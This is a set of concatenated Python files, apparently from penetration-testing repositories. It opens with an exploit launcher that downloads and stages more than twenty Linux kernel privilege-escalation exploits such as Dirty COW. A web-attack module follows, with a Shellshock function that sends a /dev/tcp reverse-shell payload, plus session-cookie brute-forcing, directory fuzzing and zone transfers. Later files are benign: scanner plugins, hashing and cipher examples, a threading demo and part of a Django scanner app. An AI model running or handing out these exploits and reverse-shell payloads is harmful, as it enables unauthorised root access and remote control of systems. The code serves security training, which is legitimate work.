        printGood("unix_privesc_check successfully created")
def sendpage_1():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/9545 -O sendpage.c'),
('Compile with:','echo "gcc -Wall -o sendpage sendpage.c"')
]
run(commands)
def sendpage_2():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/9479 -O sendpage.c'),
('Compile with:','echo "gcc -Wall -o sendpage sendpage.c"')
]
run(commands)
def ftruncate():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/6851 -O ftruncate.c'),
('Compile with:','echo "gcc -o ftruncate ftruncate.c"'),
('Note: use in world-writable directory, located using the following command:','echo "find / -perm -2000 -type d 2>/dev/null|xargs ls -ld|grep "rwx""')
]
run(commands)
def cap_sys_admin():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/15944 -O cap_sys_admin.c'),
('Compile with:','echo "gcc -w cap_sys_admin.c -o cap_sys_admin_expl"')
]
run(commands)
def compat():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/15024 -O compat.c'),
('Compile with:','echo "gcc -o compat compat.c"')
]
run(commands)
def can_bcm():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/14814 -O can_bcm_expl.c'),
('Compile with:','echo "gcc -o can_bcm_expl can_bcm_expl.c"')
]
run(commands)
def rdsProtocol():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/15285 -O rds_expl.c'),
('Compile with:','echo "gcc -o rds_expl rds_expl.c"')
]
run(commands)
def halfNelson():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/17787 -O half-nelson.c'),
('Compile with:','echo "gcc -o half-nelson half-nelson.c -lrt"')
]
run(commands)
def fullNelson():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/15704 -O full-nelson.c'),
('Compile with:','echo "gcc -o full-nelson full-nelson.c"')
]
run(commands)
def udev():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/8572 -O udev_expl.c'),
('Compile with:','echo "gcc -o udev_expl udev_expl.c"')
]
run(commands)
def sgid():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/33824 -O sgid_expl.c'),
('Compile with:','echo "gcc -o sgid_expl sgid_expl.c"')
]
run(commands)
def overlayfs_1():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/37292 -O overlayfs.c'),
('Compile with:','echo "gcc -o overlayfs overlayfs.c"')
]
run(commands)
def libfutex():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/35370 -O libfutex.c'),
('Compile with:','echo "gcc -o libfutex libfutex.c -lpthread"')
]
run(commands)
def mempodipper():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/18411 -O mempodipper.c'),
('Compile with:','echo "gcc -o mempodipper mempodipper.c"')
]
run(commands)
def alpha_omega():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/17391 -O alpha-omega.c'),
('Compile with:','echo "gcc -o alpha-omega alpha-omega.c"')
]
run(commands)
def dirtycow():
    """Download the Dirty COW (CVE-2016-5195) exploit and derive a 32-bit variant.

    The sed pipeline comments out the 64-bit shellcode block and uncomments
    the 32-bit one in the copied source, producing dirtycow_32.c alongside
    dirtycow_64.c.  Compilation is left to the operator (printed command).
    """
    commands = [
        ('Downloading...','wget https://www.exploit-db.com/download/40616 -O dirtycow_64.c'),
        ('Fixing...',"cp dirtycow_64.c dirtycow_32.c; sed -i 's/0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/\/* 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/g' dirtycow_32.c; sed -i 's/unsigned int sc_len = 177;/unsigned int sc_len = 177; *\//g' dirtycow_32.c; sed -i 's/0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/*\/ 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/g' dirtycow_32.c; sed -i 's/unsigned int sc_len = 136;/unsigned int sc_len = 136;\/*/g' dirtycow_32.c"),
        ('Compile with:','echo "gcc -o dirtycow_64 dirtycow_64.c -pthread"; echo "gcc -o dirtycow_32 dirtycow_32.c -pthread"')
    ]
    run(commands)
def msr():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/27297 -O msr_expl.c'),
('Compile with:','echo "gcc -o msr_expl msr_expl.c"')
]
run(commands)
def perf_swevent_init():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/26131 -O perf.c'),
('Compile with:','echo "gcc -o perf perf.c"')
]
run(commands)
def overlayfs_2():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/39166 -O overlayfs.c'),
('Compile with:','echo "gcc -o overlayfs overlayfs.c"')
]
run(commands)
def overlayfs_3():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/39230 -O overlayfs.c'),
('Compile with:','echo "gcc -o overlayfs overlayfs.c"')
]
run(commands)
def af_packet():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/40871 -O af_packet.c'),
('Compile with: ','echo "gcc -o af_packet af_packet.c -lpthread"')
]
run(commands)
def double_fdput():
commands = [
('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip -O double_fdput.zip'),
('Unpacking...','unzip double_fdput.zip; cd 39772; tar xvf exploit.tar;'),
('Compile with: ','echo "cd 39772/ebpf_mapfd_doubleput_exploit; ./compile.sh"'),
('Run ./doubleput','')
]
run(commands)
def netfilter():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/40049 -O netfilter.c'),
('Fixing...','tail -n 50 netfilter.c > pwn.c; head -n 213 netfilter.c > intermediate.c; tail -n 208 intermediate.c > decr.c'),
('Compile with:','echo "gcc -o decr decr.c -m32 -O2; gcc pwn.c -O2 -o pwn"'),
('Run decr, then pwn',''),
('Cleaning up...','rm netfilter.c intermediate.c')
]
run(commands)
def refcount():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/39277 -O refcount.c'),
('Compile with:','echo "gcc -o refcount refcount.c -lkeyutils -Wall"')
]
run(commands)
# Menu table for local Linux exploits: (display label, builder function).
# Labels record the affected kernel range; these should be compiled on the
# target when possible (see the section comment above).
exploits_linux_local = [
    ("linux-exploit-suggester" , linux_exploit_suggester),
    ("unix_privesc_check" , unix_privesc_check),
    ("kernel 2.4.x / 2.6.x (sock_sendpage 1)" , sendpage_1),
    ("kernel 2.4 / 2.6 (sock_sendpage 2)" , sendpage_2),
    ("kernel < 2.6.22 (ftruncate)" , ftruncate),
    ("kernel < 2.6.34 (cap_sys_admin)" , cap_sys_admin),
    ("kernel 2.6.27 < 2.6.36 (compat)" , compat),
    ("kernel < 2.6.36-rc1 (can bcm)" , can_bcm),
    ("kernel <= 2.6.36-rc8 (rds protocol)" , rdsProtocol),
    ("*kernel < 2.6.36.2 (half nelson)" , halfNelson),
    ("*kernel <= 2.6.37 (full nelson)" , fullNelson),
    ("kernel 2.6 (udev)" , udev),
    ("kernel 3.13 (sgid)" , sgid),
    ("kernel 3.13.0 < 3.19 (overlayfs 1)" , overlayfs_1),
    ("kernel 3.14.5 (libfutex)" , libfutex),
    ("kernel 2.6.39 <= 3.2.2 (mempodipper)" , mempodipper),
    ("*kernel 2.6.28 / 3.0 (alpha-omega)" , alpha_omega),
    ("kernel 2.6.22 < 3.9 (Dirty Cow)" , dirtycow),
    ("kernel 3.7.6 (msr)" , msr),
    ("*kernel < 3.8.9 (perf_swevent_init)" , perf_swevent_init),
    ("kernel <= 4.3.3 (overlayfs 2)" , overlayfs_2),
    ("kernel 4.3.3 (overlayfs 3)" , overlayfs_3),
    ("kernel 4.4.0 (af_packet)" , af_packet),
    ("kernel 4.4.x (double-fdput)" , double_fdput),
    ("kernel 4.4.0-21 (netfilter)" , netfilter),
    ("*kernel 4.4.1 (refcount)" , refcount)
]
# ------------------------------------
# UTILITY
# ------------------------------------
def endpoints(i):
    """Return the cumulative exploit count over the first *i* categories.

    Category order: windows remote, windows local, linux remote, linux
    local.  Non-integer input yields 0; i is clamped into [0, 4].
    """
    try:
        i = int(i)
    except ValueError:
        return 0
    categories = (exploits_windows_remote, exploits_windows_local,
                  exploits_linux_remote, exploits_linux_local)
    i = max(0, min(i, len(categories)))
    return sum(len(c) for c in categories[:i])
def usage():
print "USAGE: %s <exploit id>" % sys.argv[0]
print "\nWindows Remote Exploits:"
for i in range(endpoints(0), endpoints(1)):
print "%i: %s" % (i, exploits_windows_remote[i-endpoints(0)][0])
print "\nWindows Local Exploits:"
for i in range(endpoints(1), endpoints(2)):
print "%i: %s" % (i, exploits_windows_local[i-endpoints(1)][0])
print "\nLinux Remote Exploits:"
for i in range(endpoints(2), endpoints(3)):
print "%i: %s" % (i, exploits_linux_remote[i-endpoints(2)][0])
print "\nLinux Local Exploits:"
for i in range(endpoints(3), endpoints(4)):
print "%i: %s" % (i, exploits_linux_local[i-endpoints(3)][0])
def select(i):
    """Build the exploit with global index *i*; return False if out of range."""
    if i < 0 or i >= endpoints(4):
        return False
    tables = (exploits_windows_remote, exploits_windows_local,
              exploits_linux_remote, exploits_linux_local)
    for category, table in enumerate(tables):
        if i < endpoints(category + 1):
            name, builder = table[i - endpoints(category)]
            printStep("Constructing %s" % name)
            builder()
            return True
def run(commands):
    """Execute a sequence of (description, shell command) pairs.

    Prints each description before running its command.  Returns True when
    every command exits successfully, False on the first failure.
    """
    try:
        for description, command in commands:
            printStep(description)
            # shell=True is required: the command strings rely on shell
            # features (pipes, 'cd', ';' chaining, redirection).
            subprocess.check_call(command, shell=True)
    # Merged the two identical handlers: CalledProcessError = non-zero
    # exit status, OSError = the shell itself could not be started.
    except (subprocess.CalledProcessError, OSError):
        printErr("Command failed")
        return False
    return True
def printStep(s):
    # Yellow "[*]" progress line (ANSI escape, reset at end).
    print "%s [*] %s %s" % ('\033[93m', s, '\033[0m')
def printErr(s):
    # Red "[!]" error line.
    print "%s [!] %s %s" % ('\033[91m', s, '\033[0m')
def printGood(s):
    # Green "[+]" success line.
    print "%s [+] %s %s" % ('\033[92m', s, '\033[0m')
# ------------------------------------
# MAIN
# ------------------------------------
if len(sys.argv) <> 2:
usage()
sys.exit()
try:
success = select(int(sys.argv[1]))
if not success:
print "[-] Invalid selection: %s" % sys.argv[1]
usage()
except ValueError:
print "[-] Invalid selection: %s" % sys.argv[1]
usage()
| 38.618772 | 574 | 0.623516 |
owtf | """
PASSIVE Plugin for Testing for Cross site flashing (OWASP-DV-004)
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Google Hacking for Cross Site Flashing"
def run(PluginInfo):
    """Return a link list of Google-hacking resources for cross site flashing."""
    links = get_resources("PassiveCrossSiteFlashingLnk")
    return plugin_helper.resource_linklist("Online Resources", links)
| 27.785714 | 75 | 0.773632 |
owtf | from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
    """Return a link list of manual-testing resources for password remember/reset."""
    links = get_resources("ExternalRememberPasswordAndReset")
    return plugin_helper.resource_linklist("Online Resources", links)
| 28.727273 | 75 | 0.788344 |
cybersecurity-penetration-testing | # Reverse Cipher
# http://inventwithpython.com/hacking (BSD Licensed)
message = 'Three can keep a secret, if two of them are dead.'
translated = ''
i = len(message) - 1
while i >= 0:
translated = translated + message[i]
i = i - 1
print(translated) | 21.5 | 62 | 0.643123 |
Effective-Python-Penetration-Testing | import urllib
url = urllib.urlopen("http://packtpub.com/")
response_headers = url.info()
#print response_headers
#print response_headers.keys()
print response_headers['server']
| 24.428571 | 44 | 0.762712 |
Effective-Python-Penetration-Testing | #!/usr/bin/env python
from zapv2 import ZAPv2
from pprint import pprint
import time
target = 'http://example.com/'
zap = ZAPv2()
zap.urlopen(target)
time.sleep(2)
scan = zap.spider.scan(target)
time.sleep(2)
while (int(zap.spider.status(scan)) < 100):
print 'Spider progress %: ' + zap.spider.status(scan)
time.sleep(2)
print 'Spidering completed'
time.sleep(5)
scan = zap.ascan.scan(target)
while (int(zap.ascan.status(scan)) < 100):
print 'Scan progress %: ' + zap.ascan.status(scanid)
time.sleep(5)
print 'Passive Scan completed'
pprint (zap.core.alerts()) | 16.818182 | 57 | 0.693356 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import hashlib
message = raw_input("Enter the string you would like to hash: ")
md5 = hashlib.md5(message)
md5 = md5.hexdigest()
sha1 = hashlib.sha1(message)
sha1 = sha1.hexdigest()
sha256 = hashlib.sha256(message)
sha256 = sha256.hexdigest()
sha512 = hashlib.sha512(message)
sha512 = sha512.hexdigest()
print "MD5 Hash =", md5
print "SHA1 Hash =", sha1
print "SHA256 Hash =", sha256
print "SHA512 Hash =", sha512
print "End of list." | 20 | 64 | 0.701245 |
Penetration_Testing | '''
Collection of web attacks.
'''
import requests
import Queue
import urllib
import subprocess
import socket
from shlex import split
from HTMLParser import HTMLParser
from urlparse import urlparse
'''
Resume allows us to resume a brute-forcing session if our network connectivity is interrupted or the target site goes down.
'''
resume = None
def get_request(target):
req = requests.get(target)
if req.status_code != requests.codes.ok:
raise ValueError("[!] Unable to connect to target.")
else:
print "[*] Successfully connected to target."
def shellshock(target, a_ip, a_port):
    """Send a Shellshock (CVE-2014-6271) reverse-shell payload via User-Agent.

    target -- URL of a CGI endpoint to POST to
    a_ip, a_port -- attacker's listener address for the /dev/tcp callback
    """
    # Bug fixes: the original referenced an undefined name 'attacker', and
    # used str.format() on a string whose literal '{ :;}' braces make
    # .format() raise ValueError.  %-formatting sidesteps both problems.
    payload = "() { :;}; /bin/bash -i >& /dev/tcp/%s/%s 0>&1" % (a_ip, a_port)
    headers = {'User-Agent': payload}
    req = requests.post(target, headers=headers)
    if req.status_code != requests.codes.ok:
        raise ValueError("[!] Unable to execute shellshock t(X_X)t")
    else:
        print("[+] Target shellshocked. Check your listener. \n")
def build_wordlist(wordlist_file):
with open(wordlist_file, 'rb') as f:
raw_words = f.readlines()
f.close()
found_resume = False
words = Queue.Queue()
for word in raw_words:
word = word.rstrip()
if resume is not None:
if found_resume:
words.put(word)
else:
if word == resume:
found_resume = True
print "[*] Resuming word list from: {}".format(resume)
else:
words.put(word)
return words
def dir_fuzzer(url, word_queue, extensions=None):
while not word_queue.empty():
attempt = word_queue.get()
attempt_list = []
'''
Checking to see if there is a file extension. If not, we know it's a
directory path we're brute-forcing.
'''
if "." not in attempt:
attempt_list.append("/{}/".format(attempt))
else:
attempt_list.append("/{}".format(attempt))
# Brute-forcing extensions
if extensions:
for extension in extensions:
attempt_list.append("/{}{}".format(attempt, extension))
# Iterating over our list of attempts
for brute in attempt_list:
url = "{}{}".format(url, urllib.quote(brute))
try:
req = requests.get(url)
if req.status_code == requests.codes.ok:
print "[{}] => {}".format(req.status_code, url)
except:
pass
def get_robots(target):
req = requests.get(target + "/robots.txt")
if req.status_code != requests.codes.ok:
raise ValueError("[!] Unable to connect to target.")
else:
print "[*] Contents:\n"
print req.text
def test_methods(target):
req = requests.options(target)
if req.status_code != requests.codes.ok:
raise ValueError("[!] OPTIONS method not allowed.\n")
else:
print "[*] Allowed methods:\n"
print req.content
print
# Prompting for file upload
if req.content.find("PUT") != -1 or req.content.find("POST") != -1 or req.content.find("ok") != -1:
do = raw_input("Would you like to upload a file or quit the program?\n")
if "Upload" or "upload" in do:
url = raw_input("Enter the URL to upload the file to: ")
f = raw_input("Enter the filepath of the file to upload: ")
try:
req = requests.post(url, files=f)
print req.text
print
except:
print req.text
print
pass
try:
req = requests.put(url, files=f)
print req.text
print
except:
print req.text
print
pass
else:
print "Quitting now... \n"
sys.exit(0)
def session_hijacker(target):
    """Brute-force numeric session cookie values looking for an admin session."""
    # The operator supplies a marker string that only appears on the
    # admin-authenticated page, and the session cookie's name.
    exists = raw_input("Enter a string that only the admin receives once properly authenticated. (E.g., You are an admin.)\n: ")
    c_name = raw_input("Enter the cookie name. (E.g., PHPSESSID)\n: ")
    # Iterate over sessions and check if there's one with admin access
    for i in range(641):
        if i % 10 == 0:
            print "[*] Checked", str(i), "sessions."
        cookies = {c_name:str(i)}
        req = requests.get(target, cookies=cookies)
        # If the response page's contents contains the admin-only string
        if req.content.find(exists) != -1:
            print "[*] Admin session found:", str(i)
            print req.content
            print
            break
    # NOTE(review): this success message prints even when the loop finished
    # without finding an admin session — confirm intended behavior.
    print "[*] Successfully brute-forced admin session.\n"
def whois(target):
try:
bash_command = 'whois ' + target
process = subprocess.Popen(bash_command.split(), stdout=subprocess.PIPE)
output, error = process.communicate()
print output
except:
print "\n[!] This functionality is only available in Unix and Linux systems.\n"
def zone_transfer(target):
    """Attempt a DNS zone transfer (AXFR) against each of the target's nameservers."""
    try:
        # host -t ns <target>  -> list the domain's nameservers;
        # cut -d " " -f4       -> keep only the nameserver hostname column.
        p1 = subprocess.Popen(split('host -t ns ' + target), stdout=subprocess.PIPE)
        p2 = subprocess.Popen(split('cut -d " " -f4'), stdin=p1.stdout, stdout=subprocess.PIPE)
        print "[*] Results:"
        for server in p2.stdout:
            # host -l <target> <server> performs the AXFR; grep keeps the
            # A-record lines only.
            p3 = subprocess.Popen(split('host -l ' + target + ' ' + server), stdin=p2.stdout, stdout=subprocess.PIPE)
            p4 = subprocess.Popen(split('grep "has address"'), stdin=p3.stdout, stdout=subprocess.PIPE)
            output, error = p4.communicate()
            print output
    except:
        print "\n[!] This functionality is only available in Unix and Linux systems.\n"
class LinkParser(HTMLParser):
    """HTML parser that collects href links from <a> and <link> tags.

    get_links() fetches a page (sending the optional global cookies set by
    spider()) and returns its content plus every collected absolute link.
    """

    def handle_starttag(self, tag, attrs):
        # Bug fix: the original tested `tag == 'a' or 'link'`, which is
        # always truthy, so hrefs were collected from *every* tag.
        if tag in ('a', 'link'):
            for (key, value) in attrs:
                if key == 'href':
                    # Grab the new URL and add it to the collection.
                    newUrl = "{}{}".format(self.baseUrl, value)
                    self.links += [newUrl]

    def get_links(self, url):
        """Return (page content, links) for *url*; ("", []) for non-HTML."""
        self.links = []
        self.baseUrl = url
        # cookies1/cookies2 are module globals populated by spider().
        cookies = {cookies1: cookies2}
        req = requests.get(url, cookies=cookies)
        if "text/html" in req.headers["Content-Type"]:
            content = req.content
            self.feed(content)
            return content, self.links
        else:
            return "", []
def spider(url, max_pages, word=""):
    """Breadth-first crawl from *url*, stopping when *word* is found or
    *max_pages* pages have been visited.

    Prompts for an optional cookie name/value pair, stored in the module
    globals cookies1/cookies2 that LinkParser.get_links() reads.
    """
    global cookies1, cookies2
    cookies1 = raw_input("Enter the cookie name (Optional): ")
    cookies2 = raw_input("Enter the cookie value (Optional): ")
    target = [url]  # FIFO list of pages still to visit
    number_visited = 0
    found_word = False
    print "[*] Pages crawled through:\n"
    while number_visited < max_pages and target != [] and not found_word:
        number_visited += 1
        # Start from the beginning of our collection of pages to visit
        url = target[0]
        target = target[1:]
        try:
            print number_visited, url
            parser = LinkParser()
            data, links = parser.get_links(url)
            if data.find(word) > -1:
                found_word = True
            # Newly discovered links go to the back of the queue (BFS).
            target += links
        except Exception as e:
            print "[!] Error:", e
    if found_word:
        print "\n[*] The word", word, "was found at:", url
        # NOTE(review): any non-empty answer (even "no") shows the page,
        # since the condition below is always truthy — confirm intent.
        see = raw_input("Do you want to see the page content?\nAnswer: ")
        if see == "Yes" or "yes" or "Y" or "y":
            print "[*] Contents of the URL:", url
            print
            print data
    else:
        print "\n[!] Word '", word, "' was not found."
def banner_grab():
website = raw_input("Enter the target website or IP address: ")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((website, 80))
s.send('GET /\n\n')
response = s.recv(1024)
print
print response
| 24.87108 | 128 | 0.596579 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.5
import threading
import time
import logging
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s',)
counter=0
class Communicate():
    """Demo of two threads coordinating through a threading.Event and the
    module-level global ``counter``: one thread increments the counter,
    setting the event when it reaches 5; the other blocks until then."""
    def __init__(self):
        pass
    def wait_for_event(self,e):
        """Block until *e* is set (i.e. counter reached 5), then log it."""
        global counter
        logging.debug("Wait for counter to become 5")
        # wait() with no timeout blocks indefinitely until e.set() fires.
        is_set=e.wait()
        logging.debug("Hurray !! Now counter has become %s",counter)
    def increment_counter(self,e,wait_time):
        """Increment the global counter up to 10, pausing *wait_time*
        seconds per step before the event is set and 1 second after."""
        global counter
        while counter < 10 :
            logging.debug("About to increment counter")
            # Before the event fires, wait() doubles as the step delay;
            # afterwards fall back to a plain sleep.
            if e.is_set() ==False:
                e.wait(wait_time)
            else:
                time.sleep(1)
            counter=counter +1
            logging.debug("Counter Incremented : %s ",counter)
            if counter == 5:
                # Release the thread blocked in wait_for_event().
                e.set()
# Wire the demo together: one shared Event, a waiter thread and an
# incrementer thread (1 second between increments until the event fires).
obj=Communicate()
e=threading.Event()
t1=threading.Thread(name="Thread 1",target=obj.wait_for_event,args=(e,))
t2=threading.Thread(name="Thread 2",target=obj.increment_counter,args=(e,1))
t1.start()
t2.start()
| 24.833333 | 76 | 0.681378 |
Hands-On-Penetration-Testing-with-Python | # Create your views here.
import subprocess
import os
import signal
import pprint
import sys
import zipfile
import psutil
#from xtreme.crawler import Crawler
from django.http import HttpResponse
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.template import RequestContext
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response
from django.contrib.auth.decorators import login_required
from XtremeWebAPP.xtreme_server.models import *
from XtremeWebAPP.settings import SITE_ROOT
from django.contrib.auth.views import login, logout
from django.contrib.auth.models import User
#import pdfkit
# Status labels stored on the Project model.
FINISHED = 'Finished'
IN_PROGRESS = 'In Progress'
STOPPED = 'Stopped'
# project_name -> subprocess.Popen handle of its running crawler process.
CRAWLERS = {}
# Per-vulnerability-type report state, rebuilt by get_parsed_vulns() /
# get_counters() on every report request (module-level, not thread-safe).
COUNTERS={}
details={}
urll={}
msg={}
timestamp={}
Forms=[]
Form_list=[]
# Opening tag of the HTML report table; get_counters() appends rows to it.
Report_string="<table class=table table-striped table-hover style=width:70%;position:absolute;left:20%;font-size:100%>"
FOLDER_NAME = os.path.dirname(os.path.realpath(__file__))
# Script spawned as a subprocess for each new scan.
RUN_CRAWLER_FILE = os.path.join(SITE_ROOT, 'run_crawler.py')
# Static CSS locations inlined by the scripts() view.
root1=os.path.join(SITE_ROOT,'static')
root=os.path.join(root1,'css')
static_path=root1
css_folder_file1=os.path.join(root, 'bootstrap.css')
css_folder_file2=os.path.join(root, 'dashboard.css')
MANAGE_FILE_FOLDER = os.getcwd()
PRETTY_PRINTER = pprint.PrettyPrinter(indent=4)
# Display names of every attack vector the scanner reports; the report
# dictionaries above are keyed by these exact strings.
List_vuln=[ "Tautology Attack with single quoted string (numeric)",
	"Tautology Attack with single quoted string (alpha)",
	"Tautology Attack with double quoted string (numeric)",
	"Tautology Attack with double quoted string (alpha)",
	"Tautology Attack with single quoted string (integer)",
	"Tautology Attack with double quoted string (integer)",
	"Special character injection (double quote)",
	"Special character injection (single quote)",
	"Meta character injection (<)",
	"Meta character injection (>)",
	"Meta character injection (&)",
	"Comment injection (<!--)",
	"Tag injection",
	"CDATA injection (]]>)",
	"CDATA injection with script tag",
	"CDATA injection with tautology string (single quote)",
	"CDATA injection with tautology string (double quote)",
	"External entity injection",
	"Convert function Single quote",
	"Convert function double quote",
	"Executable Function injection (single quote)",
	"Executable Function injection (double quote)",
	"Internal Server Error"
	]
Len_List_vect=len(List_vuln)
def home(request):
    """Render the landing (overview) page."""
    context = {'page': 'overview'}
    try:
        response = render_to_response("index.html", context,
                                      context_instance=RequestContext(request))
    except:
        # File-wide convention: swallow render failures.
        return "error"
    return response
def home1(request):
    """Render the XML-injection overview page with current crawl progress."""
    try:
        context = {
            'page': 'overview',
            'progress': get_progress(),
        }
        return render_to_response("xml_inj_overview.html", context,
                                  context_instance=RequestContext(request))
    except:
        return "error"
def blind_overview(request):
    """Render the overview table of all blind-injection projects."""
    # Map the stored one-letter success flag to its display label.
    flag_labels = {'T': 'Yes', 'F': 'No', 'N': 'Error'}
    project_wise = []
    position = 0
    for project in BlindProject.objects.all():
        position += 1
        entry = {
            'count': position,
            'project_name': project.project_name,
            'project_status': project.project_status,
        }
        if project.success_flg in flag_labels:
            entry['success_flg'] = flag_labels[project.success_flg]
        project_wise.append(entry)
    return render_to_response("blind_overview.html", {
        'page': 'blind_overview',
        'projects': project_wise,
    }, context_instance=RequestContext(request))
def get_progress():
    """Reap finished crawler subprocesses (marking their projects
    FINISHED) and aggregate per-project and total crawl statistics.

    Returns {'total': {...}, 'projects': [...]} or the string "error".
    NOTE(review): mutates the module-level CRAWLERS dict as a side effect,
    so callers invoke it even when they discard the result.
    """
    # See if crawling has completed
    try:
        remove = []
        for project in CRAWLERS:
            # poll() is None while the process runs; 0/positive once done.
            if CRAWLERS[project].poll() >= 0:
                remove.append(project)
        for project in remove:
            CRAWLERS.pop(project)
            project = Project.objects.filter(project_name =
                str(project)).update(status = FINISHED)
        progress = {}
        # Total progress
        total = {}
        total['finished'] = Project.objects.filter(status = FINISHED).count()
        total['inprogress'] = Project.objects.filter(status = IN_PROGRESS).count()
        total['vulns'] = 0
        total['urls'] = 0
        total['processed'] = 0
        total['percentage'] = 0
        project_wise = []
        projects = Project.objects.all()
        count = 0
        if len(projects):
            # Cool. We have projects!
            for project in projects:
                count += 1
                # Only active/finished scans contribute to the totals.
                if str(project.status) in [FINISHED, IN_PROGRESS]:
                    total['urls'] += project.get_no_of_urls_discovered()
                    total['processed'] += project.get_no_urls_processed()
                    total['vulns'] += project.get_vulnerabilities_found()
                this_project = {}
                this_project['count'] = count
                this_project['name'] = project.project_name
                this_project['status'] = project.status
                this_project['urls'] = project.get_no_of_urls_discovered()
                this_project['processed'] = project.get_no_urls_processed()
                this_project['vulns'] = project.get_vulnerabilities_found()
                project_wise.append(this_project)
        if total['urls']:
            total['percentage'] = total['processed'] * 100 / total['urls']
        progess = {
            'total': total,
            'projects': project_wise
        }
        return progess
    except:
        return "error"
def tour(request):
    """Render the static product-tour page."""
    empty_context = {}
    try:
        return render_to_response("tour.html", empty_context,
                                  context_instance=RequestContext(request))
    except:
        return "error"
def progress(request):
    """Render the progress page with aggregated crawl statistics."""
    try:
        stats = get_progress()
        return render_to_response("progress.html", {'progress': stats},
                                  context_instance=RequestContext(request))
    except:
        return "error"
def new_scans(request):
    """Render the scan-creation page pre-populated with saved settings."""
    context = {'page': 'new_scan', 'settings': get_renderable_settings()}
    return render_to_response("scans.html", context,
                              context_instance=RequestContext(request))
def xml_inj(request):
    """Render the XML-injection overview page."""
    # Both get_progress() calls are kept deliberately: the function also
    # reaps finished crawler processes (mutates CRAWLERS) as a side effect.
    progress = get_progress()
    context = {'page': 'xml_overview', 'progress': get_progress()}
    return render_to_response("xml_inj_overview.html", context,
                              context_instance=RequestContext(request))
def new_scan(request):
    """POST: validate the scan form, persist a new Project row and spawn
    run_crawler.py as a background subprocess, then redirect to the
    details page. GET: render the blank scan form.
    """
    if True:
        if request.method == "POST":
            # Fall back to the stored settings if the form settings fail
            # to parse.
            try:
                settings = get_new_settings(request)
            except:
                settings = get_settings()
            queueName="-1"
            project_name = str(request.POST['projectName'])
            start_url = str(request.POST['startURL'])
            query_url = str(request.POST['startURL'])
            login_url = str(request.POST['loginURL'])
            logout_url = str(request.POST['logoutURL'])
            username_field=str(request.POST['toAuthUsernameField'])
            username=str(request.POST['toAuthUsername'])
            password_field=str(request.POST['toAuthPasswordField'])
            password=str(request.POST['toAuthPassword'])
            auth_parameters=str(request.POST['authParameters'])
            redisIP=str(request.POST['redisIP'])
            if (request.POST['queueName']):
                queueName=str(request.POST['queueName'])
            # lol == True means a project with this name already exists.
            if Project.objects.filter(project_name = project_name).count():
                lol = True
            else:
                lol = False
            if not project_name or not start_url or not query_url or lol:
                return render_to_response("new.html", {
                    'success': 'False',
                    'settings': get_renderable_settings()
                }, context_instance=RequestContext(request))
            else:
                project = Project()
                project.project_name = project_name
                project.start_url = start_url
                project.query_url = query_url
                project.login_url = login_url
                project.logout_url = logout_url
                project.allowed_extensions = str(settings['allowed_extensions'])
                project.allowed_protocols = str(settings['allowed_protocols'])
                project.consider_only = str(settings['consider_only'])
                project.exclude_fields = str(settings['exclude'])
                project.username = username
                project.password = password
                project.auth_mode = str(settings['auth_mode'])
                project.username_field=username_field
                project.password_field=password_field
                project.auth_parameters=auth_parameters
                project.queueName=queueName
                project.redisIP=redisIP
                project.status = IN_PROGRESS
                project.save()
                # Optionally persist the submitted settings as the new
                # defaults.
                if 'remember' in request.POST and len(str(request.POST['remember'])):
                    save_settings(settings)
                cmd_str = project_name
                log_file = open(project_name+'.txt', 'w')
                RUN_CRAWLER_FILE = os.path.join(SITE_ROOT, 'run_crawler.py')
                # 'exec' on POSIX makes the child replace the shell so
                # that .kill() later reaches the crawler itself.
                if sys.platform.startswith('win32'):
                    process = subprocess.Popen('python "%s" "%s"' %(RUN_CRAWLER_FILE, cmd_str),shell=True,
                                               stdout = log_file,
                                               stderr = log_file,
                                               stdin = subprocess.PIPE)
                else:
                    process = subprocess.Popen('exec python2 "%s" "%s"' %(RUN_CRAWLER_FILE, cmd_str),
                                               shell=True,
                                               stdout = log_file,
                                               stderr = log_file,
                                               stdin = subprocess.PIPE)
                CRAWLERS[project_name] = process
                return HttpResponseRedirect("/details?proj_name=%s&just=true" % (project_name))
        else:
            return render_to_response("new.html", {
                'page': 'new_scan',
                'settings': get_renderable_settings()
            }, context_instance=RequestContext(request))
def settings(request):
    """GET: render the settings page. POST: persist the submitted
    settings and re-render with an 'updated' banner.

    NOTE(review): returns the plain string "error" on failure, which is
